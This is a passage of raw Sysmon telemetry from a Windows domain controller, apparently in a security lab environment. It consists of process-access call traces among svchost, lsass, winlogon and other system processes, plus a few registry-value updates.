\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2f9b|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2f4d|c:\windows\system32\lsm.dll+5727|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+5718|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.946{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+56c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-1400-00000000A301}13042548C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-18 13:58:16.664{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\1\FriendlyNameMicrosoft Passport Container Enumeration Bus 13241300x80000000000000009962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:16.649{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0003\DriverVersion10.0.14393.0 13241300x80000000000000009961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2021-01-18 13:58:16.649{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Enum\SWD\ScDeviceEnumBus\0\FriendlyNameSmart Card Device Enumeration Bus 13241300x80000000000000009960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 13:58:16.649{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Control\Class\{62f9c741-b25a-46ce-b54c-9bccce08b6f2}\0002\DriverVersion10.0.14393.0 10341000x80000000000000009959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.649{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 